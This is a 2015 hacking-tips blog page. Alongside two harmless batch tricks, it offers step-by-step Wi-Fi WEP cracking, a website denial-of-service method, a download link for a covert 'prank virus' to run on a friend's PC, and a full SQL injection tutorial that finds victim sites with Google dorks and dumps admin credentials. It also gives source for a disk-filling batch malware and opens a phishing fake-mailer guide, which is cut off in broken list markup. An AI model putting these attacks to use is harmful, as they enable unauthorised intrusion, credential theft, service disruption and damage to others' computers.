Tuesday, July 28, 2015

copy a file to all subdirectories of a directory with batch file

Wish You have a batch file script that can copy a file to all subdirectories in a folder so, your search ends here i am providing you the script

-------------------------------------------------------------------------------------------------------------------------- .

for /r "%CD%" %%f in (.) do (

copy "me.jpg" "%%~ff" > nul )

-- -----------------------------------------------------------------------------------------------------------------------

Just copy the source code in notepad and save the file as copier.bat remember the file extension must be .bat now copy that me.jpg(you can modify the file name and its extension) and that batch file into the folder in which all subdirectories you wish to copy the script and run the batch file you got it!!!!!!

Don't forget to like and comment if you have any question i hope you enjoy scripting keep visiting the blog..

How to make Windows speak what ever you want

Theres a simple command line utility that can help you to make your computer speak what ever you want, so to do that you have to first of all download nircmd, from the link below.. http://nirsoft.net/utils/nircmd.zip

so after downloading nircmd.exe move it to system32 folder in windows that is usually located in

"c:\windows\system32" in most of the computers.

Now open notepad and copy the source code below: --------------------------------------------------------------------------------------------------------------------------

nircmd speak text "Hey %Username%, How are You this is NEO NiZeR Codings"

--------------------------------------------------------------------------------------------------------------------------

and save the file as speak.bat So when next time you run the batch file it will speak what ever you typed in the double quotes.

WI-FI HACKING

HACK A WI-FI

Step 1 : Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP . It automatically installs the necessary drivers . Allow it to install .Note :- You will not be able to connect to any Network using WiFi when using CommView .

Step 2 : Click on the PLAY ICON in the Left First

Step 3 : (Choosing the Network (a) ) : A new window should pop up now. Click on the START SCANNING button

Step 4 : (Choosing the Network (b) ) : Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.

Step 5 : (Capturing the Packets) : The windows should close now and you should see that CommView has started Capturing Packets .

Step 6 : (Saving the Packets ) : Now that the Packets are getting captured you need to Save them. Click on Settings->Options->Memory Usage Change Maximum Packets in buffer to 20000.

Click on the LOGGING Tab .

Check AUTO-SAVING In the Maximum Directory Size : 5000

Average Log File Size : 50

Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

Step 7 : ( Concatenating the Logs ) : Since you are capturing a lot of logs you will need to concatenate them into once file . To do this go to Logging and click on CONCATENATE LOGS Choose all the files that have been saved in your specified folder and Concatenate them .Now you will have one .ncf file .

Step 8 : (Converting .ncf to .cap ) : Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack . Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format .

Aircrack Part :Now for the Second Part Cracking this is very simple . Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others .

WEBSITE CRASHER

CRESH SMALL WEBSITE

First Download 3 Softwares :- 1. Download Port Scanner 2. Download rDOS 3. Download Ip Hiding tool

Follow these steps:

1: First of all you need to know the IP address of the website you want to crash. Use ping command in windows to get the ip address of the website.

open CMD and enter ping www.website.com see the snap Now you have the IP address of the website.

2: Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack otherwise you can’t crash this website.

3: Now open your rDos. Enter your victims ip that you got from step 1.It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work

Download Amazing virus for free

Here is the link of virus i have just created:

http://jmp.sh/aQhMmkR

just follow the link and download html++.exe

it's a prank virus..

How it works???

Just take this sleeky virus in to your usb to your friends pc and execut it nothing will be shown to screen all the process will done in hidden mode Now Challenge your friend to make a HTML page No doubt he would'nt be able to do that because when ever he try to write html tags His monitor will be shutdown permanently

So how to Get back to your pc when monitor get turn off Simply, press win+m key on your keyboard and then just after few seconds type "getback" you will be back share this virus as much as you can but try this at your own risk...

Tutorial: Sql Injection

Sql Injection tutorial advanced. So far in all the hacks the most used by h4ck3rs from n00b to an 1337 one has been the SQL injection attack. Here we at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to be working on a huge no. of sites.

The hack starts as follows.

Finding vulnerable site

To find a vunerable site open google

Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages.

Now click on any site like http://www.yoursite.com/index.php?id=786

Now to test if the siote is hackable or not add a ' at the end of the site.

If the site gives an error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQLserver version for the right syntax to use near '\'84' at line 1"

we can assume that it is vunerable. If not try some other site.

We have the vulnerable site now. So lets try with different sql injection queries.

Checking the number of columns:

To check the number of columns we do the following

http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below http://www.site.com/index.php?id=-786 order by 2-- (no error) similarly check http://www.site.com/index.php?id=-786 order by 3-- http://www.site.com/index.php?id=-786 order by 4-- http://www.site.com/index.php?id=-786 order by 5-- http://www.site.com/index.php?id=-786 order by 6-- =>error

if we get an error at the 6 like "unknown column" that means there exists only 5 columns.

Finding vunerable columns:

To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786

Now the url becomes

http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--

after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 4 are vunerable and data can be retrieved from colums 2 and 4. This is important as we would see data on these columns only.

Finding Mysql version:

To find the sql version we replace 2 or 4 (or the bulnerable column in yor case) with @@version.

The URL would become-

http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--

After hitting enter the sql version appears on the page in the vulnerable column space

Lets assume we got 5.0.90-community-log on page which is sql version.

Getting Table names:

To get table names replace @@version in the url with table_name and add from information_schema.tables-- to the end.

The url now becomes

http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter the page shows the tablenames.

Lets us assume we got something like this

comment,log,admin,news,news_comment,members.

To take over the site we data should be retrieved from admin table.As it seems the most favorable to contain all the passwords.

Getting the column names:

To get the column names from the table "admin" we do the following

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--

Converting the tablename to ascii:

For the real hack above first we have to convert the admin table to ascii values. Convert the tablename to ascii here

http://www.getyourwebsitehere.com/jswb/t...ascii.html

The ascii generated for the table name admin is & #97; 100; 109; 105; 110;

Now remove and add a , between them

So now it is 97,100,109,105,110

Replace it in the place of ascii of the tablename

Now it becomes

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on page

Getting username and password:

To get the username and password we use

http://www.site.com/index.php?id=-786 union

Select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.

At this point we see username and password on page.

The password may be in MD5 encrypted form, this can easilt be decrypted using the following converter-

http://www.md5decrypter.co.uk

This was a nice SQL injection hack tutorial. Please comment if you like the post.

Space Eater Virus

Hey, Guys Today i got a new trick for You.... So, Its A simple VIRUS.. oh my god lol VIRUS.. not that kind of virus its a simple prank
It's SPACE EATER so i am providing you the sorce code just copy the code below paster it in notepad and save it as space eater.bat

_________________________________________________________________________________

md %homedrive%\Spacefull attrib +r +s "%homedrive%\spacefull" :loop echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>%homedrive%\spacefull\mass goto loop

_________________________________________________________________________________

When you run this virus it will start eating up the space of your hardisk and with in a minute it will eat up to 100 MB based on your processor.. so if you want to GETBACK or recover your pc from this virus go to C:\ drive or where you OS is installed and delete the folder named as Spacefull... LOL once again you got you pc BAck Then try this and play pranks on friends...

Monday, July 27, 2015

How to Send Anonymous Email - Fake Mailer

Hi Guyz, Today I am Telling you that How to Send Anonymous Email By Fake Mailer...

You Know that Phishing is one of the most useful and simple methods for hacking email accounts.

When using phishing you need to send an email to your victim that contains the link to your phisher page.

The victim will click on this link only if he finds the mail genuine, so we need a fake mailer to make this mail appear genuine. In this post i will show you how to send anonymous email to your victim using Fake Mailer.

JUST FOOLOW THIS.STEP :-

  • step ➡ li>
  • Item 2